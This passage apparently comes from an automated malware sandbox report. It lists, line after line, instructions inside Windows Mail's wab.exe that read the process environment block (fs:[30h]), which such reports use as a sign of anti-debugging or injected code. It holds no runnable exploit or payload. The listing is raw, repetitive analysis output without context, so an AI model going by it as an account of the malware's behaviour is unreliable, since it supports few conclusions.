Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F8009 mov eax, dword ptr fs:[00000030h] 12_2_232F8009
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23315004 mov eax, dword ptr fs:[00000030h] 12_2_23315004
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23315004 mov ecx, dword ptr fs:[00000030h] 12_2_23315004
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23399060 mov eax, dword ptr fs:[00000030h] 12_2_23399060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h] 12_2_232F6074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F6074 mov eax, dword ptr fs:[00000030h] 12_2_232F6074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7072 mov eax, dword ptr fs:[00000030h] 12_2_232F7072
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C505B mov eax, dword ptr fs:[00000030h] 12_2_233C505B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320044 mov eax, dword ptr fs:[00000030h] 12_2_23320044
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h] 12_2_232F1051
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1051 mov eax, dword ptr fs:[00000030h] 12_2_232F1051
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C50B7 mov eax, dword ptr fs:[00000030h] 12_2_233C50B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AB0AF mov eax, dword ptr fs:[00000030h] 12_2_233AB0AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233300A5 mov eax, dword ptr fs:[00000030h] 12_2_233300A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F0A5 mov eax, dword ptr fs:[00000030h] 12_2_2339F0A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4080 mov eax, dword ptr fs:[00000030h] 12_2_233C4080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EA093 mov ecx, dword ptr fs:[00000030h] 12_2_232EA093
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC090 mov eax, dword ptr fs:[00000030h] 12_2_232EC090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332D0F0 mov eax, dword ptr fs:[00000030h] 12_2_2332D0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332D0F0 mov ecx, dword ptr fs:[00000030h] 12_2_2332D0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E90F8 mov eax, dword ptr fs:[00000030h] 12_2_232E90F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EC0F6 mov eax, dword ptr fs:[00000030h] 12_2_232EC0F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330B0D0 mov eax, dword ptr fs:[00000030h] 12_2_2330B0D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB0D6 mov eax, dword ptr fs:[00000030h] 12_2_232EB0D6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23319723 mov eax, dword ptr fs:[00000030h] 12_2_23319723
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EB705 mov eax, dword ptr fs:[00000030h] 12_2_232EB705
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF717 mov eax, dword ptr fs:[00000030h] 12_2_233AF717
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FD700 mov ecx, dword ptr fs:[00000030h] 12_2_232FD700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B970B mov eax, dword ptr fs:[00000030h] 12_2_233B970B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B970B mov eax, dword ptr fs:[00000030h] 12_2_233B970B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F471B mov eax, dword ptr fs:[00000030h] 12_2_232F471B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F471B mov eax, dword ptr fs:[00000030h] 12_2_232F471B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331270D mov eax, dword ptr fs:[00000030h] 12_2_2331270D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320774 mov eax, dword ptr fs:[00000030h] 12_2_23320774
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23302760 mov ecx, dword ptr fs:[00000030h] 12_2_23302760
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 mov eax, dword ptr fs:[00000030h] 12_2_23331763
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h] 12_2_232F4779
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F4779 mov eax, dword ptr fs:[00000030h] 12_2_232F4779
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov ecx, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23312755 mov eax, dword ptr fs:[00000030h] 12_2_23312755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339E750 mov eax, dword ptr fs:[00000030h] 12_2_2339E750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23323740 mov eax, dword ptr fs:[00000030h] 12_2_23323740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h] 12_2_232EF75B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332174A mov eax, dword ptr fs:[00000030h] 12_2_2332174A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C17BC mov eax, dword ptr fs:[00000030h] 12_2_233C17BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F07A7 mov eax, dword ptr fs:[00000030h] 12_2_232F07A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h] 12_2_233BD7A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321796 mov eax, dword ptr fs:[00000030h] 12_2_23321796
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321796 mov eax, dword ptr fs:[00000030h] 12_2_23321796
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h] 12_2_2336E79D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h] 12_2_233CB781
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h] 12_2_233CB781
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h] 12_2_232F37E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331E7E0 mov eax, dword ptr fs:[00000030h] 12_2_2331E7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h] 12_2_232F77F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h] 12_2_232F77F9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF7CF mov eax, dword ptr fs:[00000030h] 12_2_233AF7CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23320630 mov eax, dword ptr fs:[00000030h] 12_2_23320630
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov esi, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov eax, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23378633 mov eax, dword ptr fs:[00000030h] 12_2_23378633
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F7623 mov eax, dword ptr fs:[00000030h] 12_2_232F7623
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h] 12_2_232F5622
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h] 12_2_232F5622
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C mov eax, dword ptr fs:[00000030h] 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F0630 mov eax, dword ptr fs:[00000030h] 12_2_232F0630
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23383608 mov eax, dword ptr fs:[00000030h] 12_2_23383608
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h] 12_2_2331D600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h] 12_2_2331D600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C4600 mov eax, dword ptr fs:[00000030h] 12_2_233C4600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF607 mov eax, dword ptr fs:[00000030h] 12_2_233AF607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332360F mov eax, dword ptr fs:[00000030h] 12_2_2332360F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332670 mov eax, dword ptr fs:[00000030h] 12_2_23332670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332670 mov eax, dword ptr fs:[00000030h] 12_2_23332670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h] 12_2_232E7662
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23303660 mov eax, dword ptr fs:[00000030h] 12_2_23303660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F0670 mov eax, dword ptr fs:[00000030h] 12_2_232F0670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov esi, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov eax, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332666D mov eax, dword ptr fs:[00000030h] 12_2_2332666D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h] 12_2_232ED64A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h] 12_2_232ED64A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23325654 mov eax, dword ptr fs:[00000030h] 12_2_23325654
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov eax, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov ecx, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332265C mov eax, dword ptr fs:[00000030h] 12_2_2332265C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3640 mov eax, dword ptr fs:[00000030h] 12_2_232F3640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h] 12_2_2330F640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h] 12_2_2332C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h] 12_2_2332C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F965A mov eax, dword ptr fs:[00000030h] 12_2_232F965A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F965A mov eax, dword ptr fs:[00000030h] 12_2_232F965A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h] 12_2_233B86A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h] 12_2_233B86A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337C691 mov eax, dword ptr fs:[00000030h] 12_2_2337C691
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 mov eax, dword ptr fs:[00000030h] 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF68C mov eax, dword ptr fs:[00000030h] 12_2_233AF68C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F8690 mov eax, dword ptr fs:[00000030h] 12_2_232F8690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h] 12_2_2336C6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h] 12_2_2336C6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h] 12_2_232E96E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h] 12_2_232E96E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FC6E0 mov eax, dword ptr fs:[00000030h] 12_2_232FC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h] 12_2_232F56E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h] 12_2_233166E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h] 12_2_233166E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F06CF mov eax, dword ptr fs:[00000030h] 12_2_232F06CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331D6D0 mov eax, dword ptr fs:[00000030h] 12_2_2331D6D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BA6C0 mov eax, dword ptr fs:[00000030h] 12_2_233BA6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233986C2 mov eax, dword ptr fs:[00000030h] 12_2_233986C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332539 mov eax, dword ptr fs:[00000030h] 12_2_23332539
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E753F mov eax, dword ptr fs:[00000030h] 12_2_232E753F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23321527 mov eax, dword ptr fs:[00000030h] 12_2_23321527
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h] 12_2_232F3536
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h] 12_2_232F3536
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330252B mov eax, dword ptr fs:[00000030h] 12_2_2330252B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h] 12_2_2339F51B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h] 12_2_2339F51B
